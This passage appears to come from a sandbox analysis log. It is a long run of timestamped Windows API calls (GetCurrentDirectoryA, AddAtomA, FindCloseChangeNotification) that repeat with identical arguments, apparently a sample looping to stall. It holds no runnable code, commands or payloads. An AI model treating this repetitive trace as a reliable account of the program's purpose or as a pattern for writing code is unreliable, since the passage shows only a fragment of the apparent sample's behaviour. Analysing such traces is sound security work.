lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.901] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.901] AddAtomA (lpString=0x0) returned 0x0 [0130.901] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.901] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.901] AddAtomA (lpString=0x0) returned 0x0 [0130.901] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.901] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.901] AddAtomA (lpString=0x0) returned 0x0 [0130.901] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.901] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.901] AddAtomA (lpString=0x0) returned 0x0 [0130.901] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.901] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.901] AddAtomA (lpString=0x0) returned 0x0 [0130.901] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.901] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.901] AddAtomA (lpString=0x0) returned 0x0 [0130.901] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.901] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.901] AddAtomA (lpString=0x0) returned 0x0 [0130.901] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.901] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.901] AddAtomA (lpString=0x0) returned 0x0 [0130.901] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.901] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.901] AddAtomA (lpString=0x0) returned 0x0 [0130.901] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.902] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.902] AddAtomA (lpString=0x0) returned 0x0 [0130.902] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.902] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.902] AddAtomA (lpString=0x0) returned 0x0 [0130.902] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.902] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.902] AddAtomA (lpString=0x0) returned 0x0 [0130.902] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.902] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.902] AddAtomA (lpString=0x0) returned 0x0 [0130.902] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.902] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.902] AddAtomA (lpString=0x0) returned 0x0 [0130.902] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.902] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.902] AddAtomA (lpString=0x0) returned 0x0 [0130.902] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.902] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.902] AddAtomA (lpString=0x0) returned 0x0 [0130.902] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.902] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.902] AddAtomA (lpString=0x0) returned 0x0 [0130.902] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.903] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.903] AddAtomA (lpString=0x0) returned 0x0 [0130.903] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.903] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.903] AddAtomA (lpString=0x0) returned 0x0 [0130.903] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.903] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.903] AddAtomA (lpString=0x0) returned 0x0 [0130.903] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.903] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.903] AddAtomA (lpString=0x0) returned 0x0 [0130.903] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.903] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.903] AddAtomA (lpString=0x0) returned 0x0 [0130.903] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.903] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.903] AddAtomA (lpString=0x0) returned 0x0 [0130.904] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.904] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.904] AddAtomA (lpString=0x0) returned 0x0 [0130.904] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.905] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.905] AddAtomA (lpString=0x0) returned 0x0 [0130.905] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.906] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.906] AddAtomA (lpString=0x0) returned 0x0 [0130.906] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.906] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.906] AddAtomA (lpString=0x0) returned 0x0 [0130.906] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.906] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.906] AddAtomA (lpString=0x0) returned 0x0 [0130.906] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.906] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.906] AddAtomA (lpString=0x0) returned 0x0 [0130.906] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.906] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.906] AddAtomA (lpString=0x0) returned 0x0 [0130.906] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.906] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.906] AddAtomA (lpString=0x0) returned 0x0 [0130.906] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.906] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.906] AddAtomA (lpString=0x0) returned 0x0 [0130.906] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.906] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.906] AddAtomA (lpString=0x0) returned 0x0 [0130.906] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.906] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.906] AddAtomA (lpString=0x0) returned 0x0 [0130.906] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.907] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.907] AddAtomA (lpString=0x0) returned 0x0 [0130.907] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.907] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.907] AddAtomA (lpString=0x0) returned 0x0 [0130.907] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.907] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.907] AddAtomA (lpString=0x0) returned 0x0 [0130.907] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.907] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.907] AddAtomA (lpString=0x0) returned 0x0 [0130.907] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.907] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.907] AddAtomA (lpString=0x0) returned 0x0 [0130.907] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.907] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.907] AddAtomA (lpString=0x0) returned 0x0 [0130.907] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.907] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.907] AddAtomA (lpString=0x0) returned 0x0 [0130.907] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.907] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.907] AddAtomA (lpString=0x0) returned 0x0 [0130.907] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.907] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.907] AddAtomA (lpString=0x0) returned 0x0 [0130.907] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.908] AddAtomA (lpString=0x0) returned 0x0 [0130.908] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.908] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.909] AddAtomA (lpString=0x0) returned 0x0 [0130.909] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.909] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.910] AddAtomA (lpString=0x0) returned 0x0 [0130.910] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.910] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.911] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.911] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.911] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.912] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.912] AddAtomA (lpString=0x0) returned 0x0 [0130.912] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.913] AddAtomA (lpString=0x0) returned 0x0 [0130.913] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.913] GetCurrentDirectoryA (in: 